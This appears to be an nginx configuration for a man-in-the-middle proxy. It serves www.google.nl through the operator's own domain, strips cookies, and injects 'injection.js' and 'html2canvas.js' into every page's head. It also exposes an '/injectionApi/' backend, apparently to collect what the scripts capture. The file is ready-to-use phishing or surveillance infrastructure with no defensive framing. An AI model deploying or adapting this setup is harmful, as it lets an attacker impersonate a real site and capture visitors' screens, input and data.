server {
    listen 28310 ssl http2;
    gzip on;
    server_name your.server.name.nl;

    server_tokens off;

    ssl_certificate /etc/letsencrypt/live/your.server.name/fullchain.pem; # create this using Certbot or use your own certificate when done 
    ssl_certificate_key /etc/letsencrypt/live/your.server.name/privkey.pem; # create this using Certbot or use your own certificate when done 
    include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot
    ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot

    add_header Strict-Transport-Security "max-age=31536000; includeSubdomains" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header X-Robots-Tag none;
    add_header X-Frame-Options DENY;
    add_header X-XSS-Protection "1; mode=block" always;

    location / {
        # TODO: make it working for logged-in users
        proxy_pass https://www.google.nl;

        proxy_set_header Accept-Encoding '';
        proxy_set_header Cookie '';
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $remote_addr;
		sub_filter </head>
			'<script language="javascript" src="/media/injection.js"></script>
                         <script src="/media/html2canvas.js"></script></head>';

        sub_filter_once on;
        sub_filter_types '*';
    }

    location /media/ {
        alias ~/server-files-final/javascript/; # or the location path to the folder containing the different javascript files 
    }

    location /injectionApi/ {
        proxy_pass http://127.0.0.1:9999/;
        proxy_http_version 1.1;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}
